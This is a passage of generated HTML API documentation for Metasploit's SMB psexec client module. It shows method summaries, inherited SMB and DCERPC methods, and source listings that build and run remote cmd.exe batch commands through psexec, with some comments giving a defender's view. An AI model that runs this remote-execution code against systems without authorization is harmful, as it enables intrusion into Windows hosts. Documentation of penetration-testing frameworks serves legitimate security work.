<p>Retrieves the SERVICE_DISPLAY_NAME option, generating a random one if it is not already set.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_command-instance_method" title="#execute_command (instance method)">#<strong>execute_command</strong>(text, bat, cmd) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_command_payload-instance_method" title="#execute_command_payload (instance method)">#<strong>execute_command_payload</strong>(smbshare) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_command_with_output-instance_method" title="#execute_command_with_output (instance method)">#<strong>execute_command_with_output</strong>(text, bat, cmd, smb_share, r_ip, delay: 0, retries: 0) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_powershell_payload-instance_method" title="#execute_powershell_payload (instance method)">#<strong>execute_powershell_payload</strong> ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#mof_upload-instance_method" title="#mof_upload (instance method)">#<strong>mof_upload</strong>(smb_share) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#native_upload-instance_method" title="#native_upload (instance method)">#<strong>native_upload</strong>(smb_share, filename, service_encoder) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#powershell_installed%3F-instance_method" title="#powershell_installed? (instance method)">#<strong>powershell_installed?</strong>(smb_share, psh_path) ⇒ Boolean </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#psexec-instance_method" title="#psexec (instance method)">#<strong>psexec</strong>(command, disconnect = true) ⇒ Boolean </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Executes a single Windows command.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#service_description-instance_method" title="#service_description (instance method)">#<strong>service_description</strong> ⇒ String </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieve the SERVICE_DESCRIPTION option.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#service_name-instance_method" title="#service_name (instance method)">#<strong>service_name</strong> ⇒ String </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieves the SERVICE_NAME option, generating a random name if one is not already set.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#smb_read_file-instance_method" title="#smb_read_file (instance method)">#<strong>smb_read_file</strong>(smbshare, host, file) ⇒ String<sup>?</sup> </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieves output from the executed command.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>, <span class='object_link'><a href="../../Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>, <span class='object_link'><a href="../../Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>, <span class='object_link'><a href="../../Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Client.html" title="Msf::Exploit::Remote::SMB::Client (module)">Msf::Exploit::Remote::SMB::Client</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../Client.html#connect-instance_method" title="Msf::Exploit::Remote::SMB::Client#connect (method)">#connect</a></span>, <span class='object_link'><a href="../Client.html#domain-instance_method" title="Msf::Exploit::Remote::SMB::Client#domain (method)">#domain</a></span>, <span class='object_link'><a href="../Client.html#domain_username_split-instance_method" title="Msf::Exploit::Remote::SMB::Client#domain_username_split (method)">#domain_username_split</a></span>, <span class='object_link'><a href="../Client.html#smb_create-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_create (method)">#smb_create</a></span>, <span class='object_link'><a href="../Client.html#smb_direct-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_direct (method)">#smb_direct</a></span>, <span class='object_link'><a href="../Client.html#smb_enumprinters-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_enumprinters (method)">#smb_enumprinters</a></span>, <span class='object_link'><a href="../Client.html#smb_enumprintproviders-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_enumprintproviders (method)">#smb_enumprintproviders</a></span>, <span class='object_link'><a href="../Client.html#smb_file_exist%3F-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_file_exist? 
(method)">#smb_file_exist?</a></span>, <span class='object_link'><a href="../Client.html#smb_file_rm-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_file_rm (method)">#smb_file_rm</a></span>, <span class='object_link'><a href="../Client.html#smb_fingerprint-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_fingerprint (method)">#smb_fingerprint</a></span>, <span class='object_link'><a href="../Client.html#smb_fingerprint_windows_lang-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_fingerprint_windows_lang (method)">#smb_fingerprint_windows_lang</a></span>, <span class='object_link'><a href="../Client.html#smb_fingerprint_windows_sp-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_fingerprint_windows_sp (method)">#smb_fingerprint_windows_sp</a></span>, <span class='object_link'><a href="../Client.html#smb_hostname-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_hostname (method)">#smb_hostname</a></span>, <span class='object_link'><a href="../Client.html#smb_lanman_netshareenumall-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_lanman_netshareenumall (method)">#smb_lanman_netshareenumall</a></span>, <span class='object_link'><a href="../Client.html#smb_login-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_login (method)">#smb_login</a></span>, <span class='object_link'><a href="../Client.html#smb_lookup_share_type-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_lookup_share_type (method)">#smb_lookup_share_type</a></span>, <span class='object_link'><a href="../Client.html#smb_netshareenumall-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_netshareenumall (method)">#smb_netshareenumall</a></span>, <span class='object_link'><a href="../Client.html#smb_netsharegetinfo-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_netsharegetinfo (method)">#smb_netsharegetinfo</a></span>, <span class='object_link'><a 
href="../Client.html#smb_open-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_open (method)">#smb_open</a></span>, <span class='object_link'><a href="../Client.html#smb_peer_lm-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_peer_lm (method)">#smb_peer_lm</a></span>, <span class='object_link'><a href="../Client.html#smb_peer_os-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_peer_os (method)">#smb_peer_os</a></span>, <span class='object_link'><a href="../Client.html#smb_srvsvc_netshareenumall-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_srvsvc_netshareenumall (method)">#smb_srvsvc_netshareenumall</a></span>, <span class='object_link'><a href="../Client.html#smb_srvsvc_netsharegetinfo-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_srvsvc_netsharegetinfo (method)">#smb_srvsvc_netsharegetinfo</a></span>, <span class='object_link'><a href="../Client.html#smbhost-instance_method" title="Msf::Exploit::Remote::SMB::Client#smbhost (method)">#smbhost</a></span>, <span class='object_link'><a href="../Client.html#splitname-instance_method" title="Msf::Exploit::Remote::SMB::Client#splitname (method)">#splitname</a></span>, <span class='object_link'><a href="../Client.html#unicode-instance_method" title="Msf::Exploit::Remote::SMB::Client#unicode (method)">#unicode</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Tcp.html" title="Msf::Exploit::Remote::Tcp (module)">Tcp</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../Tcp.html#chost-instance_method" title="Msf::Exploit::Remote::Tcp#chost (method)">#chost</a></span>, <span class='object_link'><a href="../../Tcp.html#cleanup-instance_method" title="Msf::Exploit::Remote::Tcp#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../../Tcp.html#connect-instance_method" title="Msf::Exploit::Remote::Tcp#connect (method)">#connect</a></span>, <span class='object_link'><a href="../../Tcp.html#connect_timeout-instance_method" title="Msf::Exploit::Remote::Tcp#connect_timeout (method)">#connect_timeout</a></span>, <span class='object_link'><a href="../../Tcp.html#cport-instance_method" title="Msf::Exploit::Remote::Tcp#cport (method)">#cport</a></span>, <span class='object_link'><a href="../../Tcp.html#disconnect-instance_method" title="Msf::Exploit::Remote::Tcp#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="../../Tcp.html#handler-instance_method" title="Msf::Exploit::Remote::Tcp#handler (method)">#handler</a></span>, <span class='object_link'><a href="../../Tcp.html#lhost-instance_method" title="Msf::Exploit::Remote::Tcp#lhost (method)">#lhost</a></span>, <span class='object_link'><a href="../../Tcp.html#lport-instance_method" title="Msf::Exploit::Remote::Tcp#lport (method)">#lport</a></span>, <span class='object_link'><a href="../../Tcp.html#peer-instance_method" title="Msf::Exploit::Remote::Tcp#peer (method)">#peer</a></span>, <span class='object_link'><a href="../../Tcp.html#print_prefix-instance_method" title="Msf::Exploit::Remote::Tcp#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="../../Tcp.html#proxies-instance_method" title="Msf::Exploit::Remote::Tcp#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="../../Tcp.html#replicant-instance_method" title="Msf::Exploit::Remote::Tcp#replicant (method)">#replicant</a></span>, <span class='object_link'><a 
href="../../Tcp.html#rhost-instance_method" title="Msf::Exploit::Remote::Tcp#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../../Tcp.html#rport-instance_method" title="Msf::Exploit::Remote::Tcp#rport (method)">#rport</a></span>, <span class='object_link'><a href="../../Tcp.html#set_tcp_evasions-instance_method" title="Msf::Exploit::Remote::Tcp#set_tcp_evasions (method)">#set_tcp_evasions</a></span>, <span class='object_link'><a href="../../Tcp.html#shutdown-instance_method" title="Msf::Exploit::Remote::Tcp#shutdown (method)">#shutdown</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl-instance_method" title="Msf::Exploit::Remote::Tcp#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl_verify_mode-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_verify_mode (method)">#ssl_verify_mode</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl_version-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="../../Tcp.html#sslkeylogfile-instance_method" title="Msf::Exploit::Remote::Tcp#sslkeylogfile (method)">#sslkeylogfile</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC.html" title="Msf::Exploit::Remote::DCERPC (module)">DCERPC</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC.html#dcerpc_bind-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_bind (method)">#dcerpc_bind</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_call-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_call (method)">#dcerpc_call</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_getarch-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_getarch (method)">#dcerpc_getarch</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_handle-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_handle (method)">#dcerpc_handle</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_handle_target-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_handle_target (method)">#dcerpc_handle_target</a></span>, <span class='object_link'><a href="../../DCERPC.html#unicode-instance_method" title="Msf::Exploit::Remote::DCERPC#unicode (method)">#unicode</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC_LSA.html" title="Msf::Exploit::Remote::DCERPC_LSA (module)">DCERPC_LSA</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC_LSA.html#lsa_open_policy-instance_method" title="Msf::Exploit::Remote::DCERPC_LSA#lsa_open_policy (method)">#lsa_open_policy</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC_MGMT.html" title="Msf::Exploit::Remote::DCERPC_MGMT (module)">DCERPC_MGMT</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_connect-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_connect (method)">#dcerpc_mgmt_connect</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_inq_if_ids-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_inq_if_ids (method)">#dcerpc_mgmt_inq_if_ids</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_inq_if_stats-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_inq_if_stats (method)">#dcerpc_mgmt_inq_if_stats</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_inq_princ_name-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_inq_princ_name (method)">#dcerpc_mgmt_inq_princ_name</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_is_server_listening-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_is_server_listening (method)">#dcerpc_mgmt_is_server_listening</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_stop_server_listening-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_stop_server_listening (method)">#dcerpc_mgmt_stop_server_listening</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC_EPM.html" title="Msf::Exploit::Remote::DCERPC_EPM (module)">DCERPC_EPM</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC_EPM.html#dcerpc_endpoint_find_tcp-instance_method" title="Msf::Exploit::Remote::DCERPC_EPM#dcerpc_endpoint_find_tcp (method)">#dcerpc_endpoint_find_tcp</a></span>, <span class='object_link'><a href="../../DCERPC_EPM.html#dcerpc_endpoint_find_udp-instance_method" title="Msf::Exploit::Remote::DCERPC_EPM#dcerpc_endpoint_find_udp (method)">#dcerpc_endpoint_find_udp</a></span>, <span class='object_link'><a href="../../DCERPC_EPM.html#dcerpc_endpoint_list-instance_method" title="Msf::Exploit::Remote::DCERPC_EPM#dcerpc_endpoint_list (method)">#dcerpc_endpoint_list</a></span></p>
<div id="instance_method_details" class="method_details_list">
|
||
<h2>Instance Method Details</h2>
|
||
|
||
|
||
<div class="method_details first">
<!--
  Method detail: display_name (listing from psexec.rb, lines 52 to 55).
  The value is memoised in @display_name. The listing first assigns
  datastore['SERVICE_DISPLAY_NAME'] and, only if that is nil or false,
  falls back to Rex::Text.rand_text_alpha(16).
  Defender note: with the option left unset the display name is therefore a
  random alphabetic string (16 letters, assuming rand_text_alpha(16) yields
  that length), a pattern worth matching in service-installation telemetry.
-->
|
||
<h3 class="signature first" id="display_name-instance_method">
|
||
|
||
#<strong>display_name</strong> ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieve the SERVICE_DISPLAY_NAME option, generate a random one if not already set.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>the display name of the service.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
52
|
||
53
|
||
54
|
||
55</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 52</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_display_name'>display_name</span>
|
||
<span class='ivar'>@display_name</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_DISPLAY_NAME</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='ivar'>@display_name</span> <span class='op'>||=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
<!--
  Method detail: execute_command(text, bat, cmd) (listing from psexec.rb,
  lines 241 to 253). The source carries no YARD docstring, so this section
  renders a signature and listing only.
  What the listing shows:
  * cmd is passed through Msf::Post::Windows.escape_cmd_literal(cmd, spaces: false)
    before it is placed in the command line.
  * text and bat are interpolated into the command line as given, with no
    escaping; they have to be trusted, caller-generated paths.
  * The assembled command line is handed to psexec and its result is returned.
  * Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error and
    RubySMB::Error::RubySMBError are rescued: the error is logged with elog,
    reported with print_error, and the method returns false.
  Review note: the complete command line is passed to vprint_status (presumably
  shown only in verbose mode), so anything sensitive inside cmd also lands in
  console output and any saved console logs.
-->
|
||
<h3 class="signature " id="execute_command-instance_method">
|
||
|
||
#<strong>execute_command</strong>(text, bat, cmd) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
241
|
||
242
|
||
243
|
||
244
|
||
245
|
||
246
|
||
247
|
||
248
|
||
249
|
||
250
|
||
251
|
||
252
|
||
253</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 241</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_execute_command'>execute_command</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span>
|
||
<span class='comment'># Try and execute the provided command
|
||
</span> <span class='id identifier rubyid_cmd'>cmd</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Post.html" title="Msf::Post (class)">Post</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Post/Windows.html" title="Msf::Post::Windows (module)">Windows</a></span></span><span class='period'>.</span><span class='id identifier rubyid_escape_cmd_literal'><span class='object_link'><a href="../../../../Post/Windows.html#escape_cmd_literal-class_method" title="Msf::Post::Windows.escape_cmd_literal (method)">escape_cmd_literal</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span> <span class='label'>spaces:</span> <span class='kw'>false</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_execute'>execute</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>%COMSPEC% /C echo </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'> ^> %SYSTEMDRIVE%</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_text'>text</span><span class='embexpr_end'>}</span><span class='tstring_content'> > </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bat'>bat</span><span class='embexpr_end'>}</span><span class='tstring_content'> & %COMSPEC% /C start %COMSPEC% /C </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bat'>bat</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Executing the command: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_execute'>execute</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='kw'>return</span> <span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_execute'>execute</span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC.html" title="Rex::Proto::DCERPC (module)">DCERPC</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/Exceptions.html" title="Rex::Proto::DCERPC::Exceptions (module)">Exceptions</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/Exceptions/Error.html" title="Rex::Proto::DCERPC::Exceptions::Error (class)">Error</a></span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB.html" title="Rex::Proto::SMB (module)">SMB</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions.html" title="Rex::Proto::SMB::Exceptions (module)">Exceptions</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions/Error.html" title="Rex::Proto::SMB::Exceptions::Error (class)">Error</a></span></span><span class='comma'>,</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Error</span><span class='op'>::</span><span class='const'>RubySMBError</span> <span 
class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Unable to execute specified command</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rex</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../Rex/Logging.html#LEV_3-constant" title="Rex::Logging::LEV_3 (constant)">LEV_3</a></span></span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to execute specified command: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
<!--
  Method detail: execute_command_payload(smbshare) (listing from psexec.rb,
  lines 221 to 239). The source carries no YARD docstring, so this section
  renders a signature and listing only.
  What the listing shows:
  * Two paths under \Windows\Temp are built with Rex::Text.rand_text_alpha(8..16):
    one ending in .txt and one ending in .bat.
  * payload.encoded is used as the command and passed, with both paths, the
    share, simple.address and delay datastore['CMD::DELAY'], to
    execute_command_with_output.
  * When the returned output is not nil, the command and its output are printed
    and report_note stores a note of type 'psexec_command' whose name is the
    command and whose data holds the output. When it is nil nothing further
    happens in this method.
  Review notes:
  * The command string and its complete output are persisted through
    report_note (presumably into the framework's workspace data); secrets in
    either should be expected there and the data retained accordingly.
  * Defender view: files named with 8 to 16 random letters plus .txt or .bat
    under \Windows\Temp are the on-disk footprint of this path. Whether they
    are removed afterwards is not visible in this method.
-->
|
||
<h3 class="signature " id="execute_command_payload-instance_method">
|
||
|
||
#<strong>execute_command_payload</strong>(smbshare) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
221
|
||
222
|
||
223
|
||
224
|
||
225
|
||
226
|
||
227
|
||
228
|
||
229
|
||
230
|
||
231
|
||
232
|
||
233
|
||
234
|
||
235
|
||
236
|
||
237
|
||
238
|
||
239</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 221</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_execute_command_payload'>execute_command_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_text'>text</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>..</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.txt</span><span class='tstring_end'>"</span></span>
|
||
